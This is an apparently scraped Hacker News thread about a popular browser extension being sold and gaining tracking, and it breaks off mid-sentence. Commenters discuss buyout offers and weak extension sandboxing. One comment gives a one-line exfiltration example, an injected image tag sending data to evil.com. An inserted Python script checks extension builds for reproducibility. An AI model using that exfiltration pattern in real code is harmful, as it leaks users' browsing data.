[HN Gopher] I no longer trust The Great Suspender
___________________________________________________________________
I no longer trust The Great Suspender
Author : davidfstr
Score : 758 points
Date : 2021-01-20 14:01 UTC (8 hours ago)
| tra3 wrote:
| A reddit link, from the blog post [0] has all the details for
| those who don't use chrome.
|
| TLDR: A popular extension was quietly sold off to an unknown
| party that subsequently added tracking/analytics. Not
| specifically malware, but not trustworthy either.
|
| Did I miss anything?
|
| [0]:
| https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...
| peanut_worm wrote:
| Why do people keep 100s of tabs open at a time? I get irritated
| if I have more than 8 open.
| eznzt wrote:
| Because they have not found the bookmarks feature yet.
| ortusdux wrote:
| When I have 100 tabs open, 90 of them are one time use pages.
| I need to compile bits of information from each page, and
| then I never need those pages again. Why would I use
| bookmarks?
|
| For example, last week I was shopping for a very specific,
| very expensive ceramic thrust bearing. I had 20+ pages open
| from 10+ suppliers and documentation sources. I needed those
| open all week while we decided on which one to buy. This was
| a minor background task, so I also had 60 other tabs open for
| my normal work flow.
|
| Just because people use a tool differently than you doesn't
| make them wrong.
| gmiller123456 wrote:
| It'd be great if someone invented a method of working with
| bookmarks that worked as easily and seamlessly as tabs.
|
| Back in the days of social bookmarks (like del.icio.us)
| pretty much everyone had a "toread" folder. The main problem
| is that you have to remember to delete them after reading
| them. That's not really a problem for good articles you
| remember reading, but the crap articles you don't remember,
| or quit reading are easy to forget to delete from the
| bookmarks. So, you end up reading the same crap articles
| several times. With a tab, you close the window and you're
| done. With bookmarks, you have to close the window, go
| through your bookmarks, find the one that was crap that you
| have already forgotten and delete it.
|
| There's several other advantages to tabs too:
|
| Like the fact that they're naturally organized by window
| based on the task you're doing.
|
| You'll see them more often, and thus be reminded more often.
|
| They save context, like forwards and back history, and
| information you may have typed in, or a UI you may have
| manipulated.
| edeion wrote:
| That brings me to the problem with links as well as with
| e-books: you don't usually see them. When you have an open
| tab, you see it all day long until you get rid of it. When
| you have a printed book, you bump in it on a daily basis
| (unless you hide it in more books).
| hungryforcodes wrote:
| Also bookmarks don't save page context. If I'm doing
| something -- even something simple like scrolling down a
| page -- and get interrupted, it's just easier to leave it
| open.
| superkuh wrote:
| Yep. Tab history is important. How I got to some page is
| almost as important as the page itself.
|
| I've been using large tab sessions ever since Opera 5 in
| the early 2000s. Back then I'd have 20-50 tabs or so.
| These days I have sessions of 500 active tabs and 500
| suspended. It's great. I have full text tab search, and
| since my sessions last years, I know the general location
| of all important tabs. Also, since I use a single process
| browser and NoScript, all those 500+ tabs take under 3 GB
| of RAM.
|
| It's a matter of taste, but it's no new trend. Tabs, and
| tab users, have been around for 20 years now.
| jrockway wrote:
| https://xkcd.com/1172/
| sixothree wrote:
| Why do people not understand why I have 100s of tabs open? I
| get irritated when asked this question.
| nousermane wrote:
| Why indeed. Is that because bookmarks are too clumsy to use,
| and don't save your scroll position and other user input?
| redwall_hp wrote:
| Any time I'm working on something, I inevitably end up with
| 20-30 tabs with different things I'm referencing.
| Especially documentation. I think I have around 6-8 open
| when I'm not doing anything, since I pin some web apps
| (e.g. Facebook Messenger) or dashboards.
|
| It's also the best way to browse image galleries: middle
| click everything into new tabs, navigate them with the
| keyboard, and close them as you go. Beats clunky JavaScript
| lightboxes.
| blinding-streak wrote:
| Tabs are my lazy man's to-do list. Leaving them open saves all
| the context I need. Closing them means I have to spend effort
| to get them back.
| ortusdux wrote:
| Try the extension 'Session Buddy'. You can view all open tabs
| and windows, group them as needed, and then save, close, and
| reopen sessions and groups.
|
| I routinely research several related topics for a project, and
| I will need 10-30 tabs per topic open at once. Surprisingly,
| chrome manages to handle 100+ tabs on my system without issue.
| angelbar wrote:
| Please don't have more than 8 tabs open... problem solved.
|
| Other persons have other thresholds... and use cases.
|
| Some user support needs many searches that will help if
| documented later... if I bookmark all of them I will never do
| that.
| rbanffy wrote:
| I multitask. A lot. It's my job.
|
| You should see my desktop
| dbbk wrote:
| I'm a software developer and am always hovering around this
| mark. It's usually from digging through documentation, having
| multiple tabs with different areas of the app you're working on
| open, productivity tabs like Slack and Gmail, then personal
| tabs like Reddit and YouTube
| fancy_pantser wrote:
| As the developer of a pretty popular "utility" browser extension,
| I've been shocked by the volume of email I get every week about
| it.
|
| On a daily basis, I will get requests to sell the extension. Once
| or twice a week, I will receive an offer to add "a couple lines
| of code" to my extension which are always generously described as
| "allowed in the Chrome Web Store" by little fly-by-night
| organizations that only even have a landing page half the time
| and usually have throwaway-looking gmail accounts. Out of
| curiosity, I've asked a few what their code does and they never
| fully describe it, but it either collects analytics to ship home
| (my extension runs on all sites, so it's appetizing to them!) or
| places paid results at the top of any search results, for which I
| can make "thousands of dollars a month based on the number of
| North American users I have".
|
| Here is an example email I received yesterday. It's a good
| example of how they call it "an SDK" and looks like one of the
| more legit ones (they registered a domain to send email from, at
| least).
|
| > We at [redacted] are considering purchasing the complete
| > license and ownership of the extensions which have 50K+ active
| > users, may I know if you would be interested in selling? If
| > so, - what is your estimated price? Regarding the SDK
| > monetization which we discussed earlier, as it is not
| > distractive and is compatible with any other monetization. We
| > have straightforward terms and provide support for your users
| > agreement. Our partners generate 3-20 K USD monthly with our
| > solution for the browser extensions. As a kind reminder, we
| > are [redacted] -- a reputable global peer-to-peer ethical
| > proxy network. All our clients are big reputable companies, we
| > authorize their business before providing any proxy plans.
| > Look forward to your further feedback and discussing further
| > details of our financial proposal for your Software in a short
| > Zoom call or here by emails.
|
| Finally, I am also hounded by teams at Microsoft and Apple, who
| want me to port the extension to their new plugin ecosystems so
| it can be featured/showcased. I worked with Apple on one similar
| thing for an extension and it caused such a huge jump in support
| and feature requests from users that I was overwhelmed, so I am
| not keen to do it again until I have more free time. They can't
| understand why I don't want to grow by tens of thousands of users
| a week, but I'm just one person and don't make money from it
| whatsoever.
| teachtyler wrote:
| Is this any different than Railway Programming? Or is this more
| specifically applicable to high order components?
|
| https://fsharpforfunandprofit.com/rop/
| LockAndLol wrote:
| > Finally, I am also hounded by teams at Microsoft and Apple,
| who want me to port the extension to their new plugin
| ecosystems so it can be featured/showcased.
|
| Do they ask you to do that for free or is there a monetary
| amount they tack on?
| reaperducer wrote:
| I have two thoughts about this.
|
| First, respond to every inquiry by telling them the price is
| USD$70,000,000.00. And stick to that price. Many of these
| sleazy companies get their leads from the same "lead
| generators," who will eventually take you off their lists
| because they know your terms are unreasonable. It doesn't work
| for everyone, but when I did it to spammers trying to buy my
| mailing list, it significantly reduced the volume of inquiries.
|
| Second, put a page on your web site listing all of the
| offending companies, with links to the letter you received.
|
| Apr 1, 2021 - Company X promised $3-5k/month if I alter your
| search results. Link.
|
| Apr 3, 2021 - Company Y promised $1-5k/month if I promote their
| product on other people's web pages. Link.
|
| A lot of people on HN will claim "O, noes! Lawyers! Libel!" I
| wouldn't worry about it. These people don't have the money for
| lawyers, are usually in geographies without legal systems, and
| don't want their names and other information exposed in a
| public legal filing. Plus, all you're doing is stating facts.
| hinkley wrote:
| > by telling them the price is USD$70,000,000.00
|
| There's a W C Fields joke that ends, "Madame, we've already
| established what sort of woman you are, now we're just
| haggling over price."
| bluGill wrote:
| Every time they make a lower offer counter with a higher
| price. They will soon learn what kind of person they are
| dealing with.
|
| If they actually do come up with $120,000,000 - at that point
| nobody will be surprised that you cashed out. They might be
| mad, but they won't blame you.
| AnIdiotOnTheNet wrote:
| Case in point: Notch once said that his price for selling
| out Minecraft was $2B. When Microsoft eventually said
| "sounds fair" and gave it to him very few people found it
| easy to be mad at him.
| cbhl wrote:
| I wonder what the calculus was on the Microsoft side of
| the equation.
|
| "It'd take more than 10-SWE-years to build a clone, so we
| should take his offer"?
| StellarTabi wrote:
| They rewrote anyways.
| mywittyname wrote:
| They are paying for the brand, not the product. Microsoft
| is ensuring that they have mindshare in the next
| generation of gamers. That's critically important to
| maintaining their ongoing success in the gaming sector.
|
| Similar to why Disney paid billions for Star Wars: the
| company was easily capable of replicating the product;
| the issue was replicating the brand. That brand has a
| proven track record of multi-generational appeal.
| ljm wrote:
| I think it's more than just the brand right? I can't
| speak for Disney and Star Wars because Star Wars was
| never my thing.
|
| These creative endeavours have a soul, or an essence, for
| want of a better term. You can replicate a game or a
| movie and it will feel utterly soulless compared to the
| original, even if you can't visibly notice a difference.
|
| You could reproduce Minecraft but even the most
| infinitesimal divergence from the original will make it
| feel fake. Maybe the controls have a different 'feel', or
| the way the scene is rendered feels a bit off. It's just
| not Minecraft any more. There are just so many quirks and
| details that will be lost in the translation, or even
| patched over if they're seen as bugs.
|
| It's no different if you ported a game from Unity to
| Unreal and then to CryEngine. I'm sure that with a blind
| comparison you would be able to 'feel' the difference.
|
| And the same for films. The way these things were created
| has a lot of influence over the end result.
|
| On the other hand, it's exactly what can make a remake or
| remaster so successful. The Resident Evil 2 and 3 remakes
| that followed Resi 7 were phenomenal! Not totally
| faithful to the originals, didn't try to be...they just
| took an older game and gave it a new life.
| citizenkeen wrote:
| I think you've just described a brand.
|
| People don't go to Starbucks because it's the best, they
| go to Starbucks because mocha frappuccinos in Lima and
| London taste exactly the same. Any divergence, even an
| infinitesimal one, makes the frap feel fake.
| brownbat wrote:
| Reminds me of the quests to recreate the secret recipe
| for Coca-cola.
|
| The secret ingredient isn't orange peel, it's $4 billion
| a year in marketing.
| TedDoesntTalk wrote:
| You could recreate the brand and the product, and you
| still won't have millions of users playing it. They
| bought the user base, too.
| wpietri wrote:
| A brand is not just trade dress. It's a relationship
| between a company and the public. Recreating the brand
| means building those relationships.
| slongfield wrote:
| To be fair, people found plenty of other things to be mad
| at Notch about.
| drewwwwww wrote:
| that was not what people got mad at notch about
| newnamenewface wrote:
| People got mad at Notch for internet-age old reasons:
| expecting someone with high technical skills in one
| domain to have the right takes on social and political
| issues because they're now an internet social presence in
| addition to whatever creative work they've done. If
| people were realistic in their expectations of Notch,
| they'd never have been mad in the first place because
| they wouldn't have cared what inane ideas he spouted.
| grecy wrote:
| My buddy loves buying and selling stuff from the local
| newspaper. Whenever people give a low ball offer he looks
| them directly in the face and in a very confident manner
| says: "I'm accepting asking price or anything higher!"
|
| The looks on people's faces are incredible.
| madeofpalk wrote:
| I have no problem being "that sort of woman" for
| USD$70,000,000.00, over a browser extension.
| Dylan16807 wrote:
| There's a big difference between retirement money and day-
| job money, which applies both to this and the joke.
| mcjiggerlog wrote:
| I also have some extensions with users in the tens of thousands
| and can corroborate all of this. Out of curiosity I strung one
| "buyer" along to see how much they would offer and they quoted
| $0.20 per user. With the amount of money being thrown about, as
| sad as it is, it's no surprise that some devs end up selling
| out their users.
|
| In my opinion extensions have to be one of the worst sources of
| spyware these days. I am now extremely conservative with what
| extensions I use, and definitely would only use extensions from
| open source projects or companies that I trust.
|
| Something needs to change. As long as extensions have such weak
| sandboxing along with such poor app review, Google/Mozilla etc
| will keep willingly shipping spyware unbeknownst to their
| users.
|
| At least some mechanism of creating and verifying reproducible
| builds would go a long way.
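The comment above asks for a way to verify that what a store distributes is what the published source builds to. As an added example (not code from this thread or from any extension it mentions), the script below computes a content-only digest of an extension package: it hashes file paths and bytes in sorted order and ignores zip metadata such as entry order and timestamps, so two independently produced builds of the same source compare equal, while a package with extra lines in one file does not. The sample extension files, their names, and the appended line are constructed for the example.

```python
# Added example (not from the thread): a content-only digest for an extension
# package, so a store-distributed build can be compared against one rebuilt from
# the published source. Zip metadata (entry order, timestamps, compression) is
# ignored; only file paths and file bytes count.
import hashlib
import io
import zipfile


def _entries(package: bytes) -> dict:
    """Map of path -> file bytes for every non-directory entry in a zip package."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return {i.filename: zf.read(i) for i in zf.infolist() if not i.is_dir()}


def content_digest(package: bytes) -> str:
    """SHA-256 over (path, length, bytes) triples in sorted path order."""
    h = hashlib.sha256()
    for path, data in sorted(_entries(package).items()):
        h.update(path.encode("utf-8") + b"\0")
        h.update(len(data).to_bytes(8, "big"))
        h.update(data)
    return h.hexdigest()


def diff_packages(expected: bytes, actual: bytes) -> dict:
    """Which files were added, removed or changed between two packages."""
    a, b = _entries(expected), _entries(actual)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": sorted(p for p in set(a) & set(b) if a[p] != b[p]),
    }


def build_package(files: dict, date_time=(1980, 1, 1, 0, 0, 0), reverse=False) -> bytes:
    """Build a zip in memory. Entry order and timestamps are parameters so the
    example can show that they do not affect the digest."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path in sorted(files, reverse=reverse):
            info = zipfile.ZipInfo(path, date_time=date_time)
            zf.writestr(info, files[path], compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


# Constructed sample extension (hypothetical names; not any real extension's code).
SOURCE = {
    "manifest.json": b'{"manifest_version": 3, "name": "tab-helper", "version": "1.4.0"}\n',
    "background.js": b"chrome.tabs.onUpdated.addListener(() => {});\n",
}
# Build from the published source.
UPSTREAM = build_package(SOURCE)
# Same files, zipped later, by a different tool, in a different order.
STORE = build_package(SOURCE, date_time=(2021, 1, 20, 14, 1, 0), reverse=True)
# Same files plus "a couple lines of code" that the source does not contain.
TAMPERED = build_package({
    **SOURCE,
    "background.js": SOURCE["background.js"] + b"// line not present in the published source\n",
})

if __name__ == "__main__":
    print("upstream == store:", content_digest(UPSTREAM) == content_digest(STORE))
    print("upstream == tampered:", content_digest(UPSTREAM) == content_digest(TAMPERED))
    print("diff:", diff_packages(UPSTREAM, TAMPERED))
```

In practice the `expected` side is a package you built yourself from the tagged source and the `actual` side is the file the store serves; `diff_packages` tells a reviewer which files to open rather than only that something differs.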
| Someone wrote:
| If you can make thousands a month on tens of thousands of
| users, that's (very much ballpark) $0.10 per user per month.
|
| Paying $0.20 per user to buy that seems extremely low.
|
| Also, on the sandboxing/app review of extensions, does
| anybody know how well Apple vets Safari extensions? (I guess
| that could be hard if the evil parts are time-triggered,
| certainly if the code also is obfuscated (possibly in the
| name of minification)
| SamBam wrote:
| Who said they were earning thousands a month for their
| extension?
| wffurr wrote:
| If the malware seller can make $0.10 / user / month, then
| paying the extension developer a one-time fee of $0.20 *
| users is only three months to pay back. Thus considered a
| low price for the extension developer but still
| attractive to the extension developer who likely earns $0
| / user from their extension.
| koheripbal wrote:
| The only extensions I have are privacy extensions. Do people
| on here really install a bunch of random 3rd party
| extensions?
| Scoundreller wrote:
| Privacy extensions can be crap too. Cutting off web-based
| analytics makes the telemetry from those users much _more_
| valuable.
|
| Ghostery anyone?
|
| https://www.reddit.com/r/privacy/comments/59wiln/is_ghostery...
| marcus_holmes wrote:
| probably not on here no. But out there... definitely yes.
| rsync wrote:
| "In my opinion extensions have to be one of the worst sources
| of spyware these days. I am now extremely conservative with
| what extensions I use, and definitely would only use
| extensions from open source projects or companies that I
| trust."
|
| I completely agree. There are a number of features I would
| really like to use in Firefox that are available only as
| extensions and I continue to resist installing them.
|
| In fact, the only extension I use is uBlock origin - which is
| based on a fairly rich social and community history behind
| that project and its author ...
| TedDoesntTalk wrote:
| Stick to the Firefox Recommended Addons list. Those are the
| only ones which are code reviewed by real people.
|
| And uBlock Origin is in that list.
| marcus_holmes wrote:
| Also, a business model for extensions would be good - even if
| it's just an official "tip box" that enthusiastic users can
| pay into
| milankragujevic wrote:
| Is this Luminati? [0] Because this sounds so much like Luminati
| ("Hola").
|
| [0] https://luminati.io/
| nitrogen wrote:
| Do extensions require any permissions to make requests? It
| seems like a strict sandbox that prevents data from flowing out
| of a page via an extension would help, if the extension is
| something like a JSON renderer.
| londons_explore wrote:
| Most extensions need the ability to modify webpages. With
| that ability, they can easily exfiltrate data by for example
| adding a <img src=evil.com/?data=82374682376>.
|
| Trying to sandbox an extension that can modify arbitrary
| webpages in arbitrary ways is near futile.
| angry_octet wrote:
| Couldn't CSP be used to limit which paths were valid URLs?
|
| There could also be hierarchies of extension permissions,
| because they don't all need to be able to do everything.
| gruez wrote:
| extensions can also remove/add CSPs I think, either
| through modifying the header or modifying the DOM.
| angry_octet wrote:
| Yes, but you could strictly limit which extensions had
| that permission, make it a site specific permission, etc.
| Auto disabling an extension that changes to require that
| permission would be a start.
| nitrogen wrote:
| _Trying to sandbox an extension that can modify arbitrary
| webpages in arbitrary ways is near futile._
|
| Just don't let them create _script_ elements, or add any
| URLs that don't come from within the extension bundle
| itself. Browsers already have to do a ton of bookkeeping to
| track the origins of requests anyway. Doesn't seem hard,
| you just have to be thorough.
| londons_explore wrote:
| There would be ways to trick the original page into
| adding stuff for you.
|
| For example, you could patch some of the original script
| of the page and wait for it to be run.
| Dylan16807 wrote:
| Restricting the extension to pre-baked URLs means it
| takes several page loads to exfiltrate something, but
| doesn't stop it.
| MetalGuru wrote:
| Crazy. Can I ask what extension this is? Wish I had the problem
| of tens of thousands of new users wanting my product weekly :)
| wlesieutre wrote:
| Per an older comment, it's for pulling recipes off of awful
| recipe blogs. Having stumbled into recipe blogs before, the
| demand is understandable!
|
| https://chrome.google.com/webstore/detail/recipe-filter/ahlc...
| nonbirithm wrote:
| I find it so ironic they'd buy out an extension
| specifically designed to defeat SEO blogspam, just to
| insert analytics based monetization instead.
| Syntaf wrote:
| Going one step further, I found AnyList[1] on this forum
| awhile back and they also have a similar extension for
| extracting recipes from awful blogging sites.
|
| The added benefit with AnyList is that you can import
| ingredients directly into your grocery list from the
| extension. Been a huge time saver for me
|
| [1] https://www.anylist.com/
| joshstrange wrote:
| Paprika [0] can also parse any blog/recipe site and
| import the recipe. Then you can add items from recipes to
| your shopping list. I highly recommend this app, I've
| converted many friends over to it. It's a much better
| experience than trying to scroll through a blog post
| while cooking.
|
| [0] https://www.paprikaapp.com/
| wpietri wrote:
| Paprika is so good! There are a bunch of fit-and-finish
| details that tell me that it's being made by people who
| use it and who really care about listening to users.
| beepboop43 wrote:
| I'll add that I recently found how well Paprika handles
| printing recipes you have in your library. I wanted to
| print off a bunch of recipes to put in a binder and was
| very happy with how clean and simply formatted each
| recipe was, often with room to write notes on the paper.
| My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
| zerd wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| I thought that was the paid Cloud Sync feature was for.
| Does it not work for that?
| djrogers wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| My wife and I work around that by simply using the same
| paprika account for cloud sync...
|
| Paprika is a huge time and sanity saver for me - it'd be
| totally possible, but much harder for me to cook for big
| events without it!
| wlesieutre wrote:
| I love Paprika, my one complaint about it is that you
| have to be careful with the ingredients multiplier
| feature. It only touches the number at the start, so "1
| large onion thinly sliced, about 2 cups" turns into "2
| large onion thinly sliced, about 2 cups."
|
| If you're not paying attention you can miss that it
| really needs 4 cups.
| joshstrange wrote:
| Agreed, I've run into the same issue. I had hoped that
| the numbers row they show above the keyboard (on mobile)
| meant they were "special numbers" that would scale but
| alas it only scales the first number AFAICT.
| joshstrange wrote:
| > My only wish is they would implement a "family" option
| where I could easily share my library of recipes with my
| girlfriend without having to share them one at a time.
|
| I normally abhor "social" features being tacked on when
| they aren't useful but I'd pay for all the apps over
| again for this feature. Thankfully the API is pretty
| straightforward. This repo of mine [0] is super dated but
| it was still working the last time I played with
| Paprika's API.
|
| I've toyed around with setting up a little web app that
| my friends can log in with their paprika creds (I know, I
| know, but I'd tell them to use a 1-off password for this)
| so that they can use the web app either push or pull
| recipes from each other.
|
| Thankfully you can send the full paprikarecipe file via
| email and import it but it's a little clunky and things
| like Discord (which my friends use to chat) doesn't like
| file extensions over 12 characters (IIRC) so it just cuts
| off the rest of the extension characters leaving you with
| a file you can't open (without fixing the extension). I
| have some initial work to set up an AWS SES address that
| people can send recipes to that will then drop a preview
| and link to download (not an attachment, it would be
| hosted on S3) the recipe into a "recipes" Discord channel
| we use but it's still a WIP.
|
| [0] https://github.com/joshstrange/paprika-api
| [deleted]
| hosteur wrote:
| What is your extension called?
| fancy_pantser wrote:
| Recipe Filter:
| https://chrome.google.com/webstore/detail/recipe-filter/ahlc...
| criddell wrote:
| Why redact? I'm curious about who is doing this.
| rsync wrote:
| Agreed. These people need to be named and shamed.
| boomboomsubban wrote:
| It'd be annoying for the poster if they got mad, with an
| unlikely but potential legal encounter involved, and 99.9%
| of the community will never interact with the company. Even
| the few that do would likely realize their scummy business
| strategy immediately. Not worth it here.
| jrochkind1 wrote:
| With that kind of money being offered (assuming it is in the
| ballpark of true)... I wonder how many popular free extensions
| already have some of that junk in it and nobody's noticed.
| Maybe many of them? I could see a lot of devs who started out
| writing an extension as a non-paying hobby, having trouble
| turning down the free money.
|
| I feel like this is another prong in the story about threats to
| sustainability of open source done the way it used to/has been
| done previously.
| ryanlol wrote:
| > assuming it is in the ballpark of true
|
| It is. It's very easy to generate big money with ad
| replacement or proxies.
| greenshackle2 wrote:
| Some years ago I applied at a "data analytics" startup
| founded by a locally famous founder. Their official purpose
| was something something search something social media. Not
| in the US, but he was featured on our local version of
| Shark Tank at some point.
|
| During interview it became clear that their "product" was
| actually bundled malware that replaced google's and other
| ads in the browser. Evidently hot founder guy was using
| this startup as cash cow for his other ventures.
|
| There was some noise in the press about it a couple years
| later and founder guy defended himself saying he sold the
| company and wasn't responsible, except it was already
| malware when I interviewed and he was still owner so I know
| it's bullshit.
| JeanSebTr wrote:
| He is well known for that in the local startup crowd ;)
| tornato7 wrote:
| And it's something I'm surprised Google hasn't done more to
| stop considering these people are basically stealing their
| revenue in their own browser
| ugh123 wrote:
| Ask Apple or Microsoft for a full time job to work on it =)
| l3s2d wrote:
| Did Apple compensate you for your work porting your extension?
| fancy_pantser wrote:
| No, but Apple and MS both consider the increased visibility
| and growth in user count from being "featured" in their
| marketplaces as a nice bonus for the developer. If I were a
| business generating revenue from app subscriptions, I'd jump
| all over it.
| thwarted wrote:
| "We can't pay you, but you'll get exposure"
| sokoloff wrote:
| Said every ad platform ever.
| haukilup wrote:
| For a couple projects and apps I worked on, exposure in
| one of these stores would be worth a decent amount of
| engineering effort. You can convert that exposure into
| users, marketing "buzz", validation of the apps worth to
| third parties, etc.
|
| This isn't universal, of course. But not all payment
| comes in liquid form!
| redwall_hp wrote:
| And in Apple's case, you can pay $99/year for the
| exposure...
| [deleted]
| noizejoy wrote:
| > "We can't pay you, but you'll get exposure"
|
| ... said the venue owner to the musician.
|
| It's a frighteningly common invit^H^H^H^H^H^H
| exploitation providing free labour to owners of gathering
| places benefitting from that labour (like bars and
| browsers and operating systems and social networks, etc).
| kazinator wrote:
| Why should the venue owner pay the musician?
|
| It's not an iron-clad given that the musician provides
| value to a venue.
|
| Musicians who are confident they can bring business to a
| venue negotiate with confidence and get paid.
|
| Those who play for free are ones who don't have that
| confidence.
|
| What you accept is what you cost. That's the market rate.
|
| How about this argument. Say I have a restaurant.
| Typically that means there is some landlord, and I pay
| them utilities and rent in exchange for using the space.
| Now some guitar-strumming, crooning ape wants to perform
| in the same space. If he and I are to be considered part
| of the same organization, we are on the same level of the
| "org chart". We are sharing the space and doing our
| thing. Why would I pay him anything? He should pay part
| of the rent and utilities. Or, why not the other way
| around?
|
| Let's reverse it. Suppose a musician has a venue where he
| performs every night, and people come. Paying people.
| Suppose I want to sell hot-dogs and sandwiches there, and he
| lets me do that. Why the fuck should he also pay me
| anything? He would be right to ask me to pay some sort of
| rent.
|
| Now if I give the hot dogs and sandwiches for free, so
| that many more people come, and those people pay to get
| into this music venue, then there is a case that I'm
| increasing the business, and doing it out of my pocket.
| Still, that is my problem; I shouldn't be doing such a
| thing. Maybe I know what I'm doing! Or maybe I'm trying
| out new product to see how people like it or whatever
| (market research).
| worik wrote:
| " Why should the venue owner pay the musician?"
|
| Because a music venue without musicians isn't
| sokoloff wrote:
| But a dive bar is still a dive bar and a casual
| restaurant still a restaurant...
| [deleted]
| kazinator wrote:
| A dive bar is still a place where people pay for drinks,
| and not for music.
|
| The "open mic" is on Tuesday nights, because nobody goes
| there then, so there is no harm to the business, and the
| people who come to have open mic fun might buy drinks.
| kazinator wrote:
| No, it isn't a music venue without musicians.
|
| But the implied flow of money doesn't follow from that.
|
| Suppose I own an empty space with a little stage, a PA
| sound system, and some 100 chairs. I put a down payment
| on this place, paid for equipment and upgrades and have
| to pay property taxes, utilities and mortgage. If nothing
| happens there, I lose money out of my own pocket. I
| intend for it to be a music venue. I meet the definition
| of a music venue owner.
|
| Some musicians have contacted me and would like to have a
| concert there.
|
| Should anyone pay anyone? Who should pay whom?
|
| How is this for logic: "A house isn't a home without a
| family! If you want me to move into this house with my
| wife and three kids to make it a home, you're gonna have
| to pay me!"
| bluGill wrote:
| If you are generating revenue exposure can be very
| useful. However if you don't already have a good business
| model it just digs your hole deeper. Be very careful to
| be sure which you are in.
| EGreg wrote:
| Thank you for sharing this, fancy_pantser. Are you the current
| maintainer also, or the current developer?
|
| This is what capitalism looks like, folks. Someone "built it"
| so they now privately "own it", no matter how big it gets. It's
| not put into the hands of an organization. The profit motive is
| quite strong, which is why someone can be "corrupted" by very
| tempting messages like this. If you had a lake or a forest
| privately owned by one or two people, and they had a lot of
| debts, they could easily sell it to polluters and loggers.
|
| Some people scoff and say "socialism has been tried, it never
| works." I admit that socialism simply trades one class of
| elites (the capitalists with a lot of shares) for another (the
| bureaucrats with a lot of political clout). BUT! I would like
| to say that _socialism is not the only alternative_. The other
| alternative is _decentralized systems with no private
| ownership_. I'm talking about science, open source software,
| and so on. There can be a Merkle tree of version updates (e.g.
| git version control) and each one can have various reputable
| organizations (like Zagat for software) building their
| reputation vetting it. Then, each community would run their own
| app store (think Wordpress plugins) which would work with these
| reputable organizations. There would be no heroes, no
| celebrities, no tweets at 3 am to 5 million people, no pulling
| from repos without peer review, no scientists instantly
| believed after publishing on arxiv.org.
|
| Congratulations for building a popular extension,
| fancy_pantser. You live in a world where it's really bad to
| "criticize the profit", and where building it means you are
| responsible for it no matter how big it gets, but then we are
| all depending on your integrity and ability to rebuff life-
| changing amounts of money to _not_ mine our data. We can pass
| laws to punish people after the fact, or we can gradually
| change our culture by rejecting "immediate gratification" of
| updates that are not vetted, just as corporations have done
| with bleeding edge vs stable Linux distros etc. Unfortunately,
| the Web has made it so that anything can be updated at any
| time, with no sysadmins or reviewers in the loop. It's a wonder
| more malware isn't silently everywhere already.
| throwawa66 wrote:
| It's incredible how many downvotes you got for this without
| any explanation. Your proposal sounds sensible and I agree
| that we need to find a new system. It doesn't have to be this
| that you described but we should be open to change.
| Capitalism the way it is leads us in the wrong direction and
| socialism doesn't fare too much better in practice. We need
| to redraw a plan for the 21st century.
| Qwertious wrote:
| If I were to guess, it's downvoted because when SKIMMED,
| it sounds like an off-topic, far too long, and overly
| political comment.
|
| It's a fair comment, but only if you actually read it.
| vinay_ys wrote:
| https://news.ycombinator.com/newsguidelines.html might be
| the reason why a lot of things here got downvoted.
| Specifically:
|
| Please don't use Hacker News for political or ideological
| battle. It tramples curiosity.
| bjoli wrote:
| Discouraging political discussions is a very political
| thing in itself. The comment we are discussing might not
| be a great example of encouraging curiosity, but being
| the person that says "don't be so political" is
| complacent and ignorant. We arrived at the current
| situation due to political decisions and a political
| process.
|
| I am not accusing you of being that person, nor anyone
| else. I am just tired of people not seeing that upholding
| the current situation is as political as criticizing it.
| This discussion made me try to put it in words.
| pksebben wrote:
| This doesn't read like a battle, though. One could argue
| that opinions that run counter to the generally accepted
| norm are inherently good for curiosity.
| EGreg wrote:
| It is indeed incredible. As I said, you cannot "criticize
| the profit" in the USA without losing social standing.
| Capitalism is a national religion because people think the
| only alternative is socialism (collective ownership of the
| means of production - which btw isn't scary on small
| levels) and the USA fought a cold war with USSR for
| decades.
|
| That's why there will be a third party in the USA that
| unites disaffected progressives on the left with
| disaffected paleoconservatives on the right. A lot of
| people are fed up with the divisions.
|
| I welcome counterpoints and debate but as you can see --
| there are just silent downvotes instead
| isoskeles wrote:
| You're probably being downvoted because even if your
| critique might be thoughtful at some parts, it is also
| quite snarky and smarmy at the beginning, and sounds like
| it's posing an ideological battle. Starting at the third
| sentence, _"This is what capitalism looks like, folks."_
| In fact, you're still doing it, _"Capitalism is a
| national religion..."_
|
| Do you think people on HN want to engage with your
| comments when you're saying they're foolishly clinging to
| a religious belief?
|
| By the way, this was a decent point: _"[W]e are all
| depending on your integrity and ability to rebuff life-
| changing amounts of money to not mine our data."_ Maybe
| this thread would be different if you stayed with points
| like that instead of accusing people of harboring
| religious beliefs that pull the wool over our eyes,
| preventing us from seeing things your way.
| filleduchaos wrote:
| > Do you think people on HN want to engage with your
| comments when you're saying they're foolishly clinging to
| a religious belief?
|
| To be fair _you_ inserted "foolishly clinging", and are
| now blaming them for something they did not actually
| say.
|
| Capitalism _is_ highly akin to religion - they're not
| the first and will not be the last to draw that
| comparison, and plenty of words have already been written
| on the topic. If your response to reading "capitalism is
| a national religion" is to assume you're being insulted,
| perhaps consider that the statement may be more true than
| you think.
| worik wrote:
| Off topic, but....
|
| There is unlikely to be a third party in USA as the
| system is designed to have two parties.
|
| There may be a third party that forces the Dems and GoP
| to unite, back to two...
| richardwhiuk wrote:
| > decentralized systems with no private ownership
|
| aka anarchy. that turns out to be worse.
| worik wrote:
| What is your evidence?
|
| Makhnovist Ukraine, the Spanish Republic, and Zapatista
| country now...
|
| All were/are quite different. Worse than what?
| EGreg wrote:
| Anarchy is simply absence of tall hierarchies.
|
| You can have each individual community choose what
| OpenStreetMap tiles to use, what to censor etc.
|
| Like HN does. What if HN was kicked off a host? They would
| put the backups somewhere else and repoint the DNS.
|
| What if ICE seized their domain? Then we could move domain
| name resolution to a DHT.
|
| What if AT&T refused to carry it or charge extra? The
| signal could route packets along other lines. No single
| point of failure.
|
| It's not just about banning 0% or 100% but the prices and
| friction imposed by privately owned rent-seeking
| infrastructure monopolies. Why, in a span of less than 10
